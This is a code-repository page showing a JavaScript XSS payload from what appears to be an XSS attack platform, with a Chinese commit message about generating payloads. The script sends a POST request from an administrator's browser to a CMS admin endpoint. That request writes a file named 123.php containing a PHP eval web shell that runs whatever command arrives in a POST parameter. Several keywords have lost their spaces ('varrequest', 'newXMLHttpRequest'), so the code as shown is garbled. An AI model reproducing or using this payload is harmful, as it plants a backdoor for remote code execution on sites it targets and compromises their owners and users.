264460650b
1. 完成js模板,我的js模块,可以直接添加修改用于xss的js 2. 采用ace编辑器实现js代码高亮与错误检测 3. 使用js_beautify实现js代码格式化,使用jsmin实现js代码压缩 4. 整合xss'or工具部分功能,自由编码,方便生成最终的payload 5. 增加加密方式RC4,更改默认加密方式为RC4 6. 从旧版本升级并想保留记录的请务必查看Readme里的升级步骤 7. 修复一系列bug
32 lines
1.2 KiB
JavaScript
32 lines
1.2 KiB
JavaScript
varrequest = false;
|
|
if (window.XMLHttpRequest) {
|
|
request = newXMLHttpRequest();
|
|
if (request.overrideMimeType) {
|
|
request.overrideMimeType('text/xml');
|
|
}
|
|
}
|
|
else if(window.ActiveXObject) {
|
|
varversions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
|
|
for (vari = 0; i < versions.length; i++) {
|
|
try {
|
|
request = newActiveXObject(versions);
|
|
} catch (e) {}
|
|
}
|
|
}
|
|
xmlhttp = request;
|
|
function getFolder(url) {
|
|
obj = url.split('/');
|
|
return obj[obj.length - 2];
|
|
}
|
|
oUrl = top.location.href;
|
|
u = getFolder(oUrl);
|
|
add_admin();
|
|
function add_admin() {
|
|
varurl = "/" + u + "/sys_sql_query.php";
|
|
varparams = "fmdo=edit&backurl=&activepath=%2Fdata&filename=123.php&str=<%3Fphp+eval%28%24_POST%5Br123%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
|
|
xmlhttp.open("POST", url, true);
|
|
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
|
|
xmlhttp.setRequestHeader("Content-length", varparams.length);
|
|
xmlhttp.setRequestHeader("Connection", "Keep-Alive");
|
|
xmlhttp.send(varparams);
|
|
} |